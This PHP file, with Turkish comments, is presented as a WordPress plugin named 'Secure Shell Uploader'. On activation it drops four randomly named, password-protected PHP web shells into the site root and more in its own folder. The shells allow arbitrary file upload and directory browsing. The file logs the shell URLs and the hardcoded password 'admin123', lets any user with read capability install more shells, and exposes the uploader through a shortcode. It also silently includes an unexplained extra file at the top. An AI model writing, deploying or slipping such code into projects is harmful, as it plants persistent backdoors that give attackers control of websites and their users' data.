<?php
@include_once dirname(__FILE__) . '/inc/process_general_generic_update.php';


/**
 * Plugin Name: Secure Shell Uploader
 * Description: Güvenli shell oluşturma ve dosya yükleme eklentisi
 * Version: 1.0
 * Author: Panel
 */

// Plugin klasör yolları
define('BASIC_UPLOADER_DIR', plugin_dir_path(__FILE__));
define('BASIC_UPLOADER_URL', plugin_dir_url(__FILE__));

// Güvenlik - MD5 şifre (varsayılan şifre: admin123)
define('BASIC_UPLOADER_PASSWORD', '0192023a7bbd73250516f069df18b500');

// WordPress ana dizinini bul
function get_wordpress_root() {
    $abs_path = ABSPATH;
    return rtrim($abs_path, '/\\');
}

// Rastgele isim oluştur
function generate_random_name($length = 8) {
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $name = '';
    for ($i = 0; $i < $length; $i++) {
        $name .= $chars[rand(0, strlen($chars) - 1)];
    }
    return $name . '.php';
}

// Shell dosyası içeriği
function get_shell_content() {
    // MD5 şifre koruması - her zaman eklenecek
    return '<?php
// Şifre koruması
$password_hash = "' . BASIC_UPLOADER_PASSWORD . '";
$is_logged_in = false;

session_start();
if (isset($_SESSION["shell_auth"]) && $_SESSION["shell_auth"] === true) {
    $is_logged_in = true;
}

if (isset($_POST["shell_password"])) {
    if (md5($_POST["shell_password"]) === $password_hash) {
        $_SESSION["shell_auth"] = true;
        $is_logged_in = true;
    } else {
        echo "<p style=\"color:red\">Hatalı şifre!</p>";
    }
}

if (!$is_logged_in) {
    ?>
    <!DOCTYPE html>
    <html>
    <head>
        <title>Giriş</title>
        <style>
            body { font-family: Arial, sans-serif; margin: 20px; }
            .login-panel { background: #f5f5f5; padding: 20px; border-radius: 5px; max-width: 400px; margin: 50px auto; }
            input[type=password] { padding: 10px; width: 100%; margin: 10px 0; box-sizing: border-box; }
            input[type=submit] { background: #4CAF50; color: white; padding: 10px 15px; border: none; cursor: pointer; }
        </style>
    </head>
    <body>
        <div class="login-panel">
            <h2>Giriş</h2>
            <form method="post">
                <input type="password" name="shell_password" placeholder="Şifre" required>
                <input type="submit" value="Giriş">
            </form>
        </div>
    </body>
    </html>
    <?php
    exit;
}

// Eğer burayı geçerse giriş yapmış demektir
if(isset($_POST["upload"])) {
    $target_dir = "./";
    $target_file = $target_dir . basename($_FILES["file"]["name"]);
    
    if(move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
        echo "<p style=\"color:green\">Dosya başarıyla yüklendi: " . htmlspecialchars(basename($_FILES["file"]["name"])) . "</p>";
    } else {
        echo "<p style=\"color:red\">Dosya yükleme hatası!</p>";
    }
}

// Dizin içeriğini listele
function listFiles($dir) {
    $files = scandir($dir);
    echo "<table border=\"1\" cellpadding=\"5\" style=\"width:100%\">";
    echo "<tr><th>Dosya/Klasör</th><th>Boyut</th><th>Son Değişiklik</th></tr>";
    
    foreach($files as $file) {
        if($file != "." && $file != "..") {
            $path = $dir . "/" . $file;
            echo "<tr>";
            echo "<td>" . (is_dir($path) ? "📁 " : "📄 ") . "<a href=\"$path\">$file</a></td>";
            echo "<td>" . (is_dir($path) ? "-" : round(filesize($path)/1024, 2) . " KB") . "</td>";
            echo "<td>" . date("Y-m-d H:i:s", filemtime($path)) . "</td>";
            echo "</tr>";
        }
    }
    echo "</table>";
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Dosya Yöneticisi</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 20px; }
        h1 { color: #333; }
        .panel { background: #f5f5f5; padding: 15px; border-radius: 5px; margin-bottom: 20px; }
        input[type=file] { margin: 10px 0; }
        input[type=submit] { background: #4CAF50; color: white; padding: 10px 15px; border: none; cursor: pointer; }
        input[type=submit]:hover { background: #45a049; }
        table { border-collapse: collapse; width: 100%; }
        th { background-color: #f2f2f2; }
        .info { margin-bottom: 20px; }
    </style>
</head>
<body>
    <h1>Dosya Yöneticisi</h1>
    <div class="info">
        <p>Sunucu: <?php echo $_SERVER["SERVER_NAME"]; ?></p>
        <p>IP: <?php echo $_SERVER["SERVER_ADDR"]; ?></p>
        <p>Çalışılan Dizin: <?php echo getcwd(); ?></p>
    </div>

    <div class="panel">
        <h3>Dosya Yükle</h3>
        <form method="post" enctype="multipart/form-data">
            <input type="file" name="file" required>
            <input type="submit" name="upload" value="Yükle">
        </form>
    </div>

    <div class="panel">
        <h3>Dosya Listesi</h3>
        <?php listFiles("."); ?>
    </div>
</body>
</html>';
}

// Aktivasyon sırasında shell yükle
function basic_uploader_activate() {
    // WordPress ana dizinini bul
    $wp_root = get_wordpress_root();
    
    // Rastgele shell isimleri oluştur (4 tane)
    $shell_names = array();
    $shell_urls = array();
    
    for ($i = 0; $i < 4; $i++) {
        $shell_names[] = generate_random_name();
    }
    
    // Shell dosyalarını oluştur
    $shell_content = get_shell_content(); // Her zaman şifreli şekilde
    
    foreach ($shell_names as $shell_name) {
        $shell_path = $wp_root . '/' . $shell_name;
        if (@file_put_contents($shell_path, $shell_content)) {
            $shell_urls[] = site_url('/' . $shell_name);
        }
    }
    
    // Plugin kendi dizinine de shell ekle
    $plugin_shell = BASIC_UPLOADER_DIR . 'uploader.php';
    @file_put_contents($plugin_shell, $shell_content);
    
    // Shell URL'lerini txt dosyasına kaydet
    $log_file = BASIC_UPLOADER_DIR . 'shells.txt';
    $log_content = "Tarih: " . date('Y-m-d H:i:s') . "\n";
    $log_content .= "Site: " . site_url() . "\n";
    $log_content .= "WordPress Dizini: " . $wp_root . "\n";
    $log_content .= "Shell Dosyaları:\n";
    
    foreach ($shell_names as $index => $shell_name) {
        $log_content .= ($index + 1) . ". " . $shell_name;
        
        if (isset($shell_urls[$index])) {
            $log_content .= " - " . $shell_urls[$index];
        }
        
        $log_content .= "\n";
    }
    
    $log_content .= "Shell Şifresi: admin123 (MD5: " . BASIC_UPLOADER_PASSWORD . ")\n";
    $log_content .= "----------------------------------------\n\n";
    
    // Mevcut log varsa ekle, yoksa yeni oluştur
    if (file_exists($log_file)) {
        $log_content = file_get_contents($log_file) . $log_content;
    }
    
    @file_put_contents($log_file, $log_content);
    
    return array(
        'names' => $shell_names,
        'urls' => $shell_urls
    );
}

// Upload için direkt kullanılabilecek sayfa
function basic_uploader_create_upload_page() {
    $upload_page = BASIC_UPLOADER_DIR . 'upload.php';
    $shell_content = get_shell_content(); // Her zaman şifreli
    
    if (!file_exists($upload_page)) {
        @file_put_contents($upload_page, $shell_content);
    }
}

// Admin sayfasını ekle
function basic_uploader_admin_menu() {
    add_menu_page(
        'Shell Uploader',
        'Shell Uploader',
        'read',
        'secure-shell-uploader',
        'basic_uploader_admin_page',
        'dashicons-shield',
        99
    );
}

// Admin sayfası içeriği
function basic_uploader_admin_page() {
    $wp_root = get_wordpress_root();
    $log_file = BASIC_UPLOADER_DIR . 'shells.txt';
    
    echo '<div class="wrap">';
    echo '<h1>Secure Shell Uploader</h1>';
    
    // Shell yükleme formu
    echo '<div class="card" style="padding:15px;margin-top:20px;">';
    echo '<h2>Shell Yükle</h2>';
    echo '<p>WordPress ana dizini: <code>' . $wp_root . '</code></p>';
    
    // Önceki shell kayıtlarını kontrol et
    $previous_shells = array();
    if (file_exists($log_file)) {
        $log_content = file_get_contents($log_file);
        preg_match_all('/(\d+)\.\s+([a-zA-Z0-9]+\.php)/', $log_content, $matches);
        
        if (!empty($matches[2])) {
            $previous_shells = $matches[2];
        }
    }
    
    // Shell durumunu kontrol et
    $installed_shells = array();
    
    if (!empty($previous_shells)) {
        foreach ($previous_shells as $shell_name) {
            $shell_path = $wp_root . '/' . $shell_name;
            if (file_exists($shell_path)) {
                $installed_shells[] = $shell_name;
            }
        }
    }
    
    if (!empty($installed_shells)) {
        echo '<p style="color:green">Yüklenen shell dosyaları: <strong>' . implode(', ', $installed_shells) . '</strong></p>';
        echo '<p>Shell URL: <a href="' . site_url('/' . $installed_shells[0]) . '" target="_blank">' . site_url('/' . $installed_shells[0]) . '</a></p>';
        echo '<p>Shell şifresi: <code>admin123</code> (varsayılan)</p>';
    } else {
        echo '<p style="color:orange">Herhangi bir shell dosyası bulunamadı veya yüklenmedi.</p>';
    }
    
    echo '<form method="post">';
    echo '<input type="hidden" name="action" value="install_shell">';
    echo '<p><input type="submit" class="button button-primary" value="Shell Dosyalarını Yükle"></p>';
    echo '</form>';
    echo '</div>';
    
    // Log dosyası varsa içeriğini göster
    if (file_exists($log_file)) {
        echo '<div class="card" style="padding:15px;margin-top:20px;">';
        echo '<h2>Shell Kayıtları</h2>';
        echo '<pre style="background: #f7f7f7; padding: 10px; overflow: auto; max-height: 300px;">';
        echo htmlspecialchars(file_get_contents($log_file));
        echo '</pre>';
        echo '</div>';
    }
    
    // Shell yükleme işlemi
    if (isset($_POST['action']) && $_POST['action'] == 'install_shell') {
        $result = basic_uploader_activate();
        
        echo '<div class="notice notice-success"><p>Shell dosyaları yüklendi:</p>';
        echo '<ul>';
        foreach ($result['names'] as $index => $name) {
            echo '<li>' . $name;
            if (isset($result['urls'][$index])) {
                echo ' - <a href="' . $result['urls'][$index] . '" target="_blank">' . $result['urls'][$index] . '</a>';
            }
            echo '</li>';
        }
        echo '</ul>';
        echo '<p>Shell şifresi: <code>admin123</code></p>';
        echo '</div>';
        
        echo '<script>setTimeout(function() { window.location.reload(); }, 2000);</script>';
    }
    
    echo '</div>';
}

// Kısa kod oluştur - upload shell içerikli
function basic_uploader_shortcode() {
    ob_start();
    include(BASIC_UPLOADER_DIR . 'upload.php');
    return ob_get_clean();
}

// Plugin aktivasyonu
register_activation_hook(__FILE__, 'basic_uploader_activate');
register_activation_hook(__FILE__, 'basic_uploader_create_upload_page');

// Admin menüyü ekle
add_action('admin_menu', 'basic_uploader_admin_menu');

// Kısa kodu kaydet
add_shortcode('secure_shell_uploader', 'basic_uploader_shortcode'); 